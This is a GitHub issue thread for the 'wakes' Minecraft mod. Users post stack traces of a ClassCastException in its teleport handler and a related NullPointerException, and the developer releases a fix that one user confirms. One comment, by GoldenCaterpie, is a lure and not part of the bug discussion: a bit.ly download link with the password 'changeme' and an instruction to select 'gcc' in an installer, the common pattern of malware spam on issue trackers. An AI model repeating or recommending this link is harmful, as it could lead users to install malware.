### ISSUE TITLE
ClassCastException when casting FollowOwnerGoal to ProducesWake

### ISSUE THREAD

**Issue by NolanHewitt** [Goby56/wakes#101]
Neruina caught this error. I wasn't buy any water so I'm not sure what happened.

java.lang.ClassCastException class net.minecraft.class_1350 cannot be cast to class com.goby56.wakes.duck.ProducesWake (net.minecraft.class_1350 and com.goby56.wakes.duck.ProducesWake are in unnamed module of loader org.quiltmc.loader.impl.launch.knot.KnotClassLoader @271053e1)
	at net.minecraft.class_1350.handler$eeb000$wakes$onTeleport(class_1350.java517)
	at net.minecraft.class_1350.method_23343(class_1350.java143)
	at net.minecraft.class_1350.method_23345(class_1350.java126)
	at net.minecraft.class_1350.method_6268(class_1350.java113)
	at net.minecraft.class_4135.method_6268(class_4135.java65)
	at net.minecraft.class_1355.method_38849(class_1355.java120)
	at net.minecraft.class_1355.method_6275(class_1355.java111)
	at net.minecraft.class_1308.method_6023(class_1308.java771)
	at net.minecraft.class_1309.method_6007(class_1309.java2673)
	at net.minecraft.class_1308.method_6007(class_1308.java550)
	at net.minecraft.class_1296.method_6007(class_1296.java128)
	at net.minecraft.class_1429.method_6007(class_1429.java58)
	at net.minecraft.class_1493.method_6007(class_1493.java202)
	at net.minecraft.class_1309.method_5773(class_1309.java2419)
	at net.minecraft.class_1308.method_5773(class_1308.java351)
	at net.minecraft.class_1493.method_5773(class_1493.java217)
	at net.minecraft.class_3218.method_18762(class_3218.java739)
	at net.minecraft.class_1937.mixinextras$bridge$accept$208(class_1937.java)
	at com.bawnorton.neruina.handler.TickHandler.safelyTickEntities(TickHandler.java92)
	at net.minecraft.class_1937.wrapOperation$efp000$neruina$catchTickingEntities$notTheCauseOfTickLag(class_1937.java17048)
	at net.minecraft.class_1937.method_18472(class_1937.java480)
	at net.minecraft.class_3218.method_31420(class_3218.java385)
	at net.minecraft.class_5574.method_31791(class_5574.java54)
	at net.minecraft.class_3218.method_18765(class_3218.java353)
	at net.minecraft.server.MinecraftServer.method_3813(MinecraftServer.java897)
	at net.minecraft.server.MinecraftServer.method_3748(MinecraftServer.java824)
	at net.minecraft.class_1132.method_3748(class_1132.java105)
	at net.minecraft.server.MinecraftServer.method_29741(MinecraftServer.java671)
	at net.minecraft.server.MinecraftServer.method_29739(MinecraftServer.java265)
	at java.basejava.lang.Thread.run(Thread.java842)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Tosh022402** [comment]
Seems this is happening with any tamed mob that tries to teleport to a player

**Comment by Mortycio** [comment]
> Seems this is happening with any tamed mob that tries to teleport to a player

Yep, happening with cobblemon too

**Comment by NolanHewitt** [comment]
Had it happen with a pig today

java.lang.NullPointerException: Cannot invoke "net.minecraft.class_638.method_8316(net.minecraft.class_2338)" because "net.minecraft.class_310.method_1551().field_1687" is null
	at com.goby56.wakes.simulation.WakeNode.validPos(WakeNode.java:199)
	at com.goby56.wakes.simulation.WakeHandler.insert(WakeHandler.java:76)
	at com.goby56.wakes.utils.WakesUtils.placeWakeTrail(WakesUtils.java:95)
	at net.minecraft.class_1297.spawnEffects(class_1297.java:36447)
	at net.minecraft.class_1297.handler$lfb01a$wakes$tick(class_1297.java:36418)
	at net.minecraft.class_1297.method_5773(class_1297.java:475)
	at net.minecraft.class_1309.method_5773(class_1309.java:2380)
	at net.minecraft.class_1308.method_5773(class_1308.java:351)
	at net.minecraft.class_3218.method_18762(class_3218.java:739)
	at net.minecraft.class_1937.mixinextras$bridge$accept$208(class_1937.java)
	at com.bawnorton.neruina.handler.TickHandler.safelyTickEntities(TickHandler.java:92)
	at net.minecraft.class_1937.wrapOperation$ghb000$neruina$catchTickingEntities$notTheCauseOfTickLag(class_1937.java:17048)
	at net.minecraft.class_1937.method_18472(class_1937.java:480)
	at net.minecraft.class_3218.method_31420(class_3218.java:385)
	at net.minecraft.class_5574.method_31791(class_5574.java:54)
	at net.minecraft.class_3218.method_18765(class_3218.java:353)
	at net.minecraft.server.MinecraftServer.method_3813(MinecraftServer.java:897)
	at net.minecraft.server.MinecraftServer.method_3748(MinecraftServer.java:824)
	at net.minecraft.class_1132.method_3748(class_1132.java:105)
	at net.minecraft.server.MinecraftServer.method_29741(MinecraftServer.java:671)
	at net.minecraft.server.MinecraftServer.method_29739(MinecraftServer.java:265)
	at java.base@17.0.11/java.lang.Thread.run(Thread.java:842)

**Comment by NolanHewitt** [comment]
Had it occur with a hostile spider. I think it can happen with any mob.

**Comment by sigmaminecrafter** [comment]
Keeps happen to dog

**Comment by sigmaminecrafter** [comment]
Who made this mod; 🤡🤡🤡

**Comment by sigmaminecrafter** [comment]
The sigma who is me: 🗿🗿🗿

**Comment by SuperHappy-source** [comment]
this is still true, even in defiled, please fix this soon.

**Comment by Goby56** [comment]
@NolanHewitt the second crash log you provided is related to issue #102.

A fix should be implemented in the next version of the mod

**Comment by Goby56** [comment]
Please try the latest version to see if it has been resolved.

**Comment by BlueIsADude** [comment]
Seems to work so far! Tested it out in a superflat world with a Wolf and a modded pet, and haven't ran into a crash at all!
